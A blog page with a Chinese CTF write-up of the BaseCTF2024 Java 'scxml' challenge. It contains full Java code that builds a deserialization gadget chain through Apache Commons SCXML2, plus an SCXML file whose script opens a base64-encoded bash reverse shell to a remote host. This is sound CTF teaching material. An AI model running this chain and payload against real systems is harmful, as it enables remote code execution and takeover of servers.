<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="作者：Narcher	时间：2024&#x2F;9&#x2F;13	分类：writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="BaseCTF2024_JAVA题解(一血)">
<meta property="og:url" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/index.html">
<meta property="og:site_name" content="Narcherの小窝">
<meta property="og:description" content="作者：Narcher	时间：2024&#x2F;9&#x2F;13	分类：writeup">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240915211020451.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913115829227.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913115938570.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120048524.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120435194.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120742029.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120825966.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913122709575.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913122626236.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913122747697.png">
<meta property="og:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/qq_pic_merged_1726140343822.jpg">
<meta property="article:published_time" content="2024-11-08T06:38:16.483Z">
<meta property="article:modified_time" content="2024-09-15T13:11:25.430Z">
<meta property="article:author" content="Narcher Alter">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240915211020451.png">

<link rel="canonical" href="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>BaseCTF2024_JAVA题解(一血) | Narcherの小窝</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Narcherの小窝</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Narcher Alter">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Narcherの小窝">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BaseCTF2024_JAVA题解(一血)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2024-11-08 14:38:16" itemprop="dateCreated datePublished" datetime="2024-11-08T14:38:16+08:00">2024-11-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2024-09-15 21:11:25" itemprop="dateModified" datetime="2024-09-15T21:11:25+08:00">2024-09-15</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><em>作者：Narcher</em>	<em>时间：2024&#x2F;9&#x2F;13</em>	<em>分类：writeup</em></p>
<span id="more"></span>

<h3 id="Fin-scxml"><a href="#Fin-scxml" class="headerlink" title="[Fin] scxml"></a>[Fin] scxml</h3><h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240915211020451.png" alt="image-20240915211020451" style="zoom:50%;">

<p>看见有java题没人做，于是便做了做，感觉还行，直到比赛结束只有三解</p>
<h4 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h4><p>N1师傅的题，难度刚刚好</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913115829227.png" alt="image-20240913115829227" style="zoom:50%;">

<p>先下载附件看看：</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913115938570.png" alt="image-20240913115938570" style="zoom: 67%;">

<p>有一个自定义的包n1ght.jar，打开分析一下：</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120048524.png" alt="image-20240913120048524" style="zoom:50%;">

<p>自定义写了个类，并含有toString方法，再看看Main：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.net.httpserver.HttpServer;</span><br><span class="line"><span class="keyword">import</span> javax.naming.InitialContext;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Main</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        <span class="type">var</span> <span class="variable">port</span> <span class="operator">=</span> Integer.parseInt(System.getenv().getOrDefault(<span class="string">&quot;PORT&quot;</span>, <span class="string">&quot;8000&quot;</span>));</span><br><span class="line">        <span class="type">var</span> <span class="variable">server</span> <span class="operator">=</span> HttpServer.create(<span class="keyword">new</span> <span class="title class_">java</span>.net.InetSocketAddress(port), <span class="number">0</span>);</span><br><span class="line">        server.createContext(<span class="string">&quot;/&quot;</span>, req -&gt; &#123;</span><br><span class="line">            <span class="type">var</span> <span class="variable">code</span> <span class="operator">=</span> <span class="number">200</span>;</span><br><span class="line">            <span class="type">var</span> <span class="variable">response</span> <span class="operator">=</span> <span class="keyword">switch</span> (req.getRequestURI().getPath()) &#123;</span><br><span class="line">                <span class="keyword">case</span> <span class="string">&quot;/scxml&quot;</span> -&gt; &#123;</span><br><span class="line">                    <span class="keyword">try</span> &#123;</span><br><span class="line">                        <span class="type">var</span> <span class="variable">param</span> <span class="operator">=</span> req.getRequestURI().getQuery();</span><br><span class="line">                        <span class="keyword">yield</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.ObjectInputStream(<span class="keyword">new</span> <span class="title class_">java</span>.io.ByteArrayInputStream(java.util.Base64.getDecoder().decode(param))).readObject().toString();</span><br><span class="line">                    &#125; <span class="keyword">catch</span> (Throwable e) &#123;</span><br><span class="line">                        e.printStackTrace();</span><br><span class="line">                        <span class="keyword">yield</span> <span class="string">&quot;:(&quot;</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">default</span> -&gt; &#123;</span><br><span class="line">                    code = <span class="number">404</span>;</span><br><span class="line">                    <span class="keyword">yield</span> <span class="string">&quot;Not found&quot;</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;;</span><br><span class="line">            req.sendResponseHeaders(code, <span class="number">0</span>);</span><br><span class="line">            <span class="type">var</span> <span class="variable">os</span> <span class="operator">=</span> req.getResponseBody();</span><br><span class="line">            os.write(response.getBytes());</span><br><span class="line">            os.close();</span><br><span class="line">        &#125;);</span><br><span class="line">        server.start();</span><br><span class="line">        System.out.printf(<span class="string">&quot;Server listening on :%s\n&quot;</span>, port);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>发现在&#x2F;scxml路由下对查询的参数进行了Base64解密，并在反序列化后执行了toString方法，再联想到上边那个自定义包里的类，八成是用那个InvokerImpl类作为入口点，再结合下边的依赖以及题目名字，不难想到scxml的RCE漏洞：<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_73512445/article/details/134451789">Apache SCXML2 RCE漏洞_scxml scxmlexecutor-CSDN博客</a></p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120435194.png" alt="image-20240913120435194" style="zoom:67%;">

<p>当然，我们还是回到上边继续跟题目来：</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120742029.png" alt="image-20240913120742029" style="zoom:67%;">

<p>InvokerImpl的构造器要求传入三个参数，第一个Invoker有点可疑，点进去看看：</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913120825966.png" alt="image-20240913120825966" style="zoom:50%;">

<p>发现是个接口，那么我们去找找它的实现类，结果发现只有一个SimpleSCXMLInvoker类，结合上边贴出来的那个漏洞，打就完了</p>
<p>因为InvokerImpl触发的是SimpleSCXMLInvoker类的invoke方法，我们看一下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">invoke</span><span class="params">(String source, Map&lt;String, Object&gt; params)</span> <span class="keyword">throws</span> InvokerException &#123;</span><br><span class="line">    <span class="type">SCXML</span> <span class="variable">scxml</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        scxml = SCXMLReader.read(<span class="keyword">new</span> <span class="title class_">URL</span>(source));</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ModelException var9) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvokerException</span>(var9.getMessage(), var9.getCause());</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var10) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvokerException</span>(var10.getMessage(), var10.getCause());</span><br><span class="line">    &#125; <span class="keyword">catch</span> (XMLStreamException var11) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvokerException</span>(var11.getMessage(), var11.getCause());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">Evaluator</span> <span class="variable">eval</span> <span class="operator">=</span> <span class="built_in">this</span>.parentSCInstance.getEvaluator();</span><br><span class="line">    <span class="built_in">this</span>.executor = <span class="keyword">new</span> <span class="title class_">SCXMLExecutor</span>(eval, <span class="keyword">new</span> <span class="title class_">SimpleDispatcher</span>(), <span class="keyword">new</span> <span class="title class_">SimpleErrorReporter</span>());</span><br><span class="line">    <span class="type">Context</span> <span class="variable">rootCtx</span> <span class="operator">=</span> eval.newContext((Context)<span class="literal">null</span>);</span><br><span class="line">    <span class="type">Iterator</span> <span class="variable">var6</span> <span class="operator">=</span> params.entrySet().iterator();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(var6.hasNext()) &#123;</span><br><span class="line">        Map.Entry&lt;String, Object&gt; entry = (Map.Entry)var6.next();</span><br><span class="line">        rootCtx.setLocal((String)entry.getKey(), entry.getValue());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">this</span>.executor.setRootContext(rootCtx);</span><br><span class="line">    <span class="built_in">this</span>.executor.setStateMachine(scxml);</span><br><span class="line">    <span class="built_in">this</span>.executor.addListener(scxml, <span class="keyword">new</span> <span class="title class_">SimpleSCXMLListener</span>());</span><br><span class="line">    <span class="built_in">this</span>.executor.registerInvokerClass(<span class="string">&quot;scxml&quot;</span>, <span class="built_in">this</span>.getClass());</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.executor.go();</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ModelException var8) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvokerException</span>(var8.getMessage(), var8.getCause());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">this</span>.executor.getCurrentStatus().isFinal()) &#123;</span><br><span class="line">        <span class="type">TriggerEvent</span> <span class="variable">te</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TriggerEvent</span>(<span class="built_in">this</span>.eventPrefix + invokeDone, <span class="number">3</span>);</span><br><span class="line">        (<span class="keyword">new</span> <span class="title class_">AsyncTrigger</span>(<span class="built_in">this</span>.parentSCInstance.getExecutor(), te)).start();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>很简单的逻辑，对我们传入的source进行URL查询后，解析所得的xml文件并执行，其实到<code>this.executor.go();</code>就结束了，之后注意一下前边调用到的参数都一一传参避免在前边报错就好了：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.n1ght.InvokerImpl;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.scxml2.SCInstance;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.scxml2.SCXMLExecutor;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.scxml2.env.SimpleContext;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.scxml2.env.SimpleErrorReporter;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.scxml2.env.jexl.JexlEvaluator;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.scxml2.invoke.SimpleSCXMLInvoker;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">SCXMLExecutor</span> <span class="variable">executor</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SCXMLExecutor</span>();</span><br><span class="line">        executor.setRootContext(<span class="keyword">new</span> <span class="title class_">SimpleContext</span>());</span><br><span class="line">        executor.setEvaluator(<span class="keyword">new</span> <span class="title class_">JexlEvaluator</span>());</span><br><span class="line">        executor.setErrorReporter(<span class="keyword">new</span> <span class="title class_">SimpleErrorReporter</span>());</span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;org.apache.commons.scxml2.SCInstance&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">constructor</span> <span class="operator">=</span> c.getDeclaredConstructor(SCXMLExecutor.class);</span><br><span class="line">        constructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">SCInstance</span> <span class="variable">scInstance</span> <span class="operator">=</span> (SCInstance) constructor.newInstance(executor);</span><br><span class="line">        setValue(scInstance,<span class="string">&quot;evaluator&quot;</span>, <span class="keyword">new</span> <span class="title class_">JexlEvaluator</span>());</span><br><span class="line">        <span class="type">SimpleSCXMLInvoker</span> <span class="variable">simpleSCXMLInvoker</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SimpleSCXMLInvoker</span>();</span><br><span class="line">        simpleSCXMLInvoker.setSCInstance(scInstance);</span><br><span class="line">        Map&lt;String, Object&gt; params = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        params.put(<span class="string">&quot;Narcher&quot;</span>,<span class="string">&quot;Alter&quot;</span>);</span><br><span class="line">        <span class="type">InvokerImpl</span> <span class="variable">invoker</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerImpl</span>(simpleSCXMLInvoker,<span class="string">&quot;http://1.1.1.1:6666/scxml2.xml&quot;</span>,params);<span class="comment">//vps地址</span></span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">barr</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(barr);</span><br><span class="line">        oos.writeObject(invoker);</span><br><span class="line">        oos.close();</span><br><span class="line">        System.out.println(<span class="keyword">new</span> <span class="title class_">String</span>(Base64.getEncoder().encode(barr.toByteArray())));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setValue</span><span class="params">(Object obj,String name,Object value)</span><span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> obj.getClass().getDeclaredField(name);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中scxml2.xml内容如下（记得自己改vps地址）：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=<span class="string">&quot;1.0&quot;</span>?&gt;</span><br><span class="line">&lt;scxml xmlns=<span class="string">&quot;http://www.w3.org/2005/07/scxml&quot;</span> version=<span class="string">&quot;1.0&quot;</span> initial=<span class="string">&quot;run&quot;</span>&gt;</span><br><span class="line">        &lt;state id=<span class="string">&quot;run&quot;</span>&gt;</span><br><span class="line">                &lt;onentry&gt;</span><br><span class="line">                        &lt;script&gt;</span><br><span class="line">                                <span class="string">&#x27;&#x27;</span>.getClass().forName(<span class="string">&#x27;java.lang.Runtime&#x27;</span>).getRuntime().exec(<span class="string">&#x27;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzc3NzcgMD4mMQo=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#x27;</span>)</span><br><span class="line">                        &lt;/script&gt;</span><br><span class="line">                &lt;/onentry&gt;</span><br><span class="line">        &lt;/state&gt;</span><br><span class="line">&lt;/scxml&gt;</span><br></pre></td></tr></table></figure>

<p>之后用我上边的链子打就完了（记得url编码），下面附上图：</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913122709575.png" alt="image-20240913122709575" style="zoom:50%;">

<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913122626236.png" alt="image-20240913122626236" style="zoom:67%;">

<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/image-20240913122747697.png" alt="image-20240913122747697" style="zoom:67%;">

<p>成功反弹shell并命令执行获得flag</p>
<h4 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h4><p>本题的难度在于网上没有现成的payload，从头自己找一条链子对于大多数脚本小子来说可能有些难度，其次就是没注意到应该把链子放在传参的key上或者是在自己构造链子的时候各种地方漏了赋值等等，题目总的来说还挺好玩的</p>
<p>最后贴上一血：</p>
<img src="/2024/11/08/BaseCTF2024_JAVA%E9%A2%98%E8%A7%A3(%E4%B8%80%E8%A1%80)/qq_pic_merged_1726140343822.jpg" alt="qq_pic_merged_1726140343822" style="zoom: 80%;">
    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2024/11/08/BeginCTF2024_WEB_WP/" rel="next" title="BeginCTF2024_WEB_WP">
      BeginCTF2024_WEB_WP <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Fin-scxml"><span class="nav-number">1.</span> <span class="nav-text">[Fin] scxml</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A3%E6%96%87"><span class="nav-number">1.2.</span> <span class="nav-text">正文</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">1.3.</span> <span class="nav-text">小结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Narcher Alter</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
